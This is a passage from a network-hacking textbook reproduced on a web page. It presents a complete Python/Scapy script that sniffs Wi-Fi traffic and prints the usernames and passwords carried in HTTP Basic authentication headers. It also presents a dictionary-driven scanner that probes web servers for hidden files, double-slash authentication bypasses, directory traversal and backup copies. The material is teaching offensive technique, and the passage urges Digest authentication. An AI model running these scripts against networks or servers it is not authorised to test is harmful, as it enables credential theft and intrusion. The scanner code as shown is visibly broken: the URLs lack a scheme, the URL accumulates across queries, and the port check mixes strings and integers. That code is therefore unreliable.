Menu
Home
Log in / Register
 
Home arrow Computer Science arrow Understanding Network Hacks
< Prev   CONTENTS   Next >

7.7 HTTP-Auth Sniffing

Most HTTP authentications are running in the so called Basic mode. A lot of administrators do not even know that the login data is transferred in plaintext when selecting this method, because it's only encoded with Base64 before send over the net. A short script should demonstrate how easy it is for an attacker to grab all of such HTTP authentications.

1 #!/usr/bin/python

2

3 import re

4 from base64 import b64decode

5 from scapy.all import sniff

6

7 dev = "wlan0"

8

9 def handle_packet(packet):

10 tcp = packet.getlayer("TCP")

11 match = re.search(r"Authorization: Basic (.+)",

12 str(tcp.payload))

13

14 if match:

15 auth_str = b64decode(match.group(1))

16 auth = auth_str.split(":")

17 print "User: " + auth[0] + " Pass: " + auth[1]

18

19 sniff(iface=dev,

20 store=0,

21 filter="tcp and port 80",

22 prn=handle_packet)

Once more we use the much loved Scapy function sniff to read the HTTP traffic, extract the TCP layer in the function handle_packet() to access the real payload. In the payload we search for the string Authorization: Basic and cut the following Base64 string with the help of a regular expression. If this was successful the string gets decoded and split by the colon into username and password. That's all it takes to circumvent HTTP-Basic-Auth! So do yourself a favor and use Digest-Authentication to protect your web applications with HTTP Auth!

7.8 Webserver Scanning

On almost all web servers that the author has seen, so far at least, one file or directory existed that should not be shared with the whole world, but was provided to it thanks to the web server's configuration. There is a general misconception that such a file or directory cannot be found, because it is not linked on any web page.

With a few lines of Python code and armed with a dictionary that consists of possible invisible but interesting file and dictionary names per line we will prove that this assumption is wrong. One of the basic rules of IT security is that “security by obscurity” doesn't work.

First of all create the dictionary file like the following. Better dictionaries can for example be found bundled with the tool Chaosmap (see Sect. 7.15).

1 old

2 admin

3 doc

4 documentation

5 backup

6 transfer

7 lib

8 include

9 sql

10 conf

The dictionary file gets iterated in a for loop search entry by search entry. First we append a slash to the search entry, than two slashes, because some web servers are misconfigured in a way that their authentication mechanisms will only react on a single slash. The most popular example of this kind is probably the servers integrated into the Axis surveillance cameras (see packetstormsecurity.org/ files/31168/core.axis.txt).

Last but not least, we try to access the search terms together with a directory traversal. A directory traversal tries to enter the parent directory by prepending “../” to the search entry. The manipulated term gets appended to the base url and afterwards send to the web server.

If the script gets executed in file mode we append a list of possible other ending to every search entry such as tilde or .old and .back to find backup files.

1 #!/usr/bin/python

2

3 import sys

4 import getopt

5 import httplib2

6

7 # Try to get url from server

8 def surf(url, query):

9 print "GET " + query

10

11 try:

12 response, content = web_client.request(url)

13

14 if response.status == 200:

15 print "FOUND " + query

16 except httplib2.ServerNotFoundError :

17 print "Got error for " + url +

18 ": Server not found"

19 sys.exit(1)

20

21

22 # Dictionary file

23 query_file = "web-queries.txt"

24

25 # Target http server and port

26 host = "localhost"

27 port = 80

28

29 # Run in file mode?

30 file_mode = False

31

32 # Parsing parameter

33 try:

34 cmd_opts = "f:Fh:p:"

35 opts, args = getopt.getopt(sys.argv[1:], cmd_opts)

36 except getopt.GetoptError:

37 print sys.argv[0] + """

38 -f <query_file>

39 -F(ile_mode)

40 -h <host>

41 -p <port>"""

42 sys.exit(0)

43

44 for opt in opts:

45 if opt[0] == "-f":

46 query_file = opt[1]

47 elif opt[0] == "-F":

48 file_mode = True

49 elif opt[0] == "-h":

50 host = opt[1]

51 elif opt[0] == "-p":

52 port = opt[1]

53

54 if port == 443:

55 url = "https://" + host

56 elif port != 80:

57 url = "" + host + ":" + port

58 else:

59 url = "" + host

60

61 # This pattern will be added to each query

62 salts = ('~', '~1', '.back', '.bak',

63 '.old', '.orig', '_backup')

64

65 # Get a web browser object

66 web_client = httplib2.Http()

67

68 # Read dictionary and handle each query

69 for query in open(query_file):

70 query = query.strip(" ")

71

72 # Try dictionary traversal

73 for dir_sep in ['/', '//', '/test/../']:

74 url += dir_sep + query

75

76 if file_mode:

77 for salt in salts:

78 url += salt

79 surf(url,

80 dir_sep + query + salt)

81 else:

82 surf(url, dir_sep + query)

 
Found a mistake? Please highlight the word and press Shift + Enter  
< Prev   CONTENTS   Next >
 
Subjects
Accounting
Business & Finance
Communication
Computer Science
Economics
Education
Engineering
Environment
Geography
Health
History
Language & Literature
Law
Management
Marketing
Philosophy
Political science
Psychology
Religion
Sociology
Travel